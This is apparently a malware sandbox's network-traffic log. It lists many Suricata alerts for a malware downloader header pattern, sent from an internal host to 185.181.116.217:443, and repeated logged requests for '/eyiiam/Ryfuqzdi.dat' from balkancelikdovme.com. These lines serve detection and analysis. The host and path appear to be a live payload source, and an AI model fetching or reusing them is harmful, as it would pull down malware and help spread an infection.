Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50002 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50014 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49922 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50034 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50041 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49988 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50026 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50020 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50055 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50048 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50068 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49976 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49941 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49994 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49888 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49982 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50107 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50121 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50126 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50088 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50110 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50111 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49964 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50134 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50108 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50106 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50144 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50142 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50122 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50081 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50128 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50139 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50138 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50112 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50093 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50114 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50155 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50127 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50136 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50130 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50145 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50140 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50163 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50172 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50166 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50115 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50135 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50182 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50131 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50149 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50169 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50061 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50181 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50148 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50173 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50171 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50185 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50119 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50188 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50170 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50197 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50183 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50196 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50118 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50175 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50202 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50177 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50160 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50191 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50147 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50159 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50190 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50150 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50207 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50154 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50205 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50203 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50164 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50161 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50146 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50184 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50179 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50165 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50189 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50195 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50178 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50123 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50162 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50204 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50199 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50167 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50125 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50180 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50137 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50157 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50143 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50194 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50198 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50174 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50153 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50133 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50158 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50206 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50117 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50200 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50099 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50141 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50129 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50152 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50116 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50074 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50120 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50187 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50186 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50113 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50176 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50151 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50132 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50109 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50208 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50201 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50193 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50156 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50192 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50124 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50168 -> 185.181.116.217:443
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Ryfuqzdi.dat HTTP/1.1Host: balkancelikdovme.com
